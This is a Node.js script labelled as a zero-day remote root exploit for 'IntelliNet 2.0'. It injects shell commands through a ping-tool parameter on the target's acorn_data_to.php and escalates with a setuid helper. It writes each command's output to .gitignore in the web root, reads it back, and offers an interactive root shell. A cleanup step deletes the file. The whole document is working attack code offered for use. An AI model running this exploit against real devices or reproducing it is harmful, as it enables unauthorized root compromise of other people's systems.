#!/usr/local/bin/node
const { execSync } = require('child_process');
const readline = require('readline');
let TARGET = '';
let COMMAND = '';
let SESSION = '';
const ESCALATE = '/usr/aes/bin/exec_suid';
console.log(`
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣧⣶⣶⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⣠⣾⢿⣿⣿⣿⣏⠉⠉⠛⠛⠿⣷⣕⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⣠⣾⢝⠄⢀⣿⡿⠻⣿⣄⠀⠀⠀⠀⠈⢿⣧⡀⣀⣤⡾⠀⠀⠀
⠀⠀⠀⢰⣿⡡⠁⠀⠀⣿⡇⠀⠸⣿⣾⡆⠀⠀⣀⣤⣿⣿⠋⠁⠀⠀⠀⠀
⠀⠀⢀⣷⣿⠃⠀⠀⢸⣿⡇⠀⠀⠹⣿⣷⣴⡾⠟⠉⠸⣿⡇⠀⠀⠀⠀⠀
⠀⠀⢸⣿⠗⡀⠀⠀⢸⣿⠃⣠⣶⣿⠿⢿⣿⡀⠀⠀⢀⣿⡇⠀⠀⠀⠀⠀
⠀⠀⠘⡿⡄⣇⠀⣀⣾⣿⡿⠟⠋⠁⠀⠈⢻⣷⣆⡄⢸⣿⡇⠀⠀⠀⠀⠀
⠀⠀⠀⢻⣷⣿⣿⠿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠻⣿⣷⣿⡟⠀⠀⠀⠀⠀⠀
⢀⣰⣾⣿⠿⣿⣿⣾⣿⠇⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣿⣅⠀⠀⠀⠀⠀⠀
⠀⠰⠊⠁⠀⠙⠪⣿⣿⣶⣤⣄⣀⣀⣀⣤⣶⣿⠟⠋⠙⢿⣷⡄⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⣿⡟⠺⠭⠭⠿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠙⠏⣦⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢸⡟⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
╔════════════════════════════════════════════╗
║ IntelliNet 2.0 Remote Root Exploit (0-Day) ║
║ Author: Jean Pereira <info@cytres.com> ║
╚════════════════════════════════════════════╝
`);
const cleanUp = () => {
execSync(
`curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;rm%20.gitignore;"`
);
};
const createShell = (cmd) => {
execSync(
`curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;${encodeURIComponent(
[ESCALATE, cmd].join(' ')
)}%20%3E%20.gitignore;"`
);
return execSync(`curl -sL "http://${TARGET}/.gitignore"`).toString().trim();
};
const rl = readline.createInterface({
input: process.stdin,
output: process.stdout,
});
const interactiveShell = () => {
rl.question(`root@${SESSION.slice(8)}:~# `, (currentCommand) => {
if (currentCommand.trim() === '!q') {
console.log('Cleaning up...');
cleanUp();
rl.close();
} else {
COMMAND = currentCommand;
let output = createShell(COMMAND);
console.log(output);
interactiveShell();
}
});
};
rl.question('[*] Enter target IP: ', (targetIP) => {
TARGET = targetIP;
SESSION = createShell('echo a1b2c3d4$HOSTNAME');
if (!SESSION.startsWith('a1b2c3d4')) {
console.log('[*] Could not execute payload, aborting');
process.exit(0);
} else {
console.log('[*] Payload injected to firmware');
console.log('[*] Launching root shell via exec_suid');
}
console.log('');
interactiveShell();
});
rl.on('close', () => {
process.exit(0);
});